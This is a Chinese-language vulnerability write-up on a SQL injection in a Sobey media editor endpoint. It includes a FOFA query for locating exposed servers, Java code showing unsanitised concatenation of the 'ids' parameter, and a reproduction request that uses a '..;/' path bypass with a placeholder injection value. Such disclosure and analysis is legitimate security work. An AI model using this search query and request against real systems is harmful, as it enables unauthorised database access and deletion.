漏洞简介
索贝产品中的 /sobey-mchEditor/mch/jztEditorScore/deleteScore 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制。
影响版本
fofa语法
icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"
漏洞分析
根据漏洞信息看下mch/jztEditorScore/deleteScore的实现逻辑
@RequestMapping(
value = {"/deleteScore"},
method = {RequestMethod.POST}
)
public Response deleteScore(@RequestParam("token") String token, @RequestParam("siteCode") String siteCode, @RequestParam("ids") String ids) {
if (StringUtils.isNotEmpty(ids)) {
String[] idArray = ids.split(",");
StringBuffer deleteBuffer = new StringBuffer("delete from zcncommoneditorscore where 1= 1 ");
SchemaSQLUtil.appendInCondition(deleteBuffer, "id", Arrays.asList(idArray));
(new QueryBuilder(deleteBuffer.toString())).executeNoQuery();
}
return Response.successMsg(this.enTips("delete.success", "删除成功。"));
}
参数ids使用逗号分割成数组后带入appendInCondition跟进
public static <T> void appendInCondition(StringBuffer sqlbuffer, String colomnName, Collection<T> values) {
appendInCondition(sqlbuffer, colomnName, values, false);
}
public static <T> void appendInCondition(StringBuffer sqlbuffer, String colomnName, Collection<T> values, boolean or) {
if (!or) {
sqlbuffer.append(String.format(" and %s in (", colomnName));
} else {
sqlbuffer.append(String.format(" or %s in (", colomnName));
}
int num = values.size();
for(T value : values) {
sqlbuffer.append(String.format(" '%s' ", value.toString()));
--num;
if (num > 0) {
sqlbuffer.append(",");
}
}
sqlbuffer.append(") ");
}
代码一看就很明了了,ids是无任何过滤或校验处理,被直接拼接在in子语句中,从而造成了SQL注入漏洞。
漏洞复现
POST /sobey-mchEditor/js/..;/mch/jztEditorScore/deleteScore HTTP/1.1
Host: sobey.mrxn.net
Content-Type: application/x-www-form-urlencoded
channelId=1&ids='SQLI_POC&isRenYuan=1&siteCode=&token=&userCode=admin

成功延时 5 秒

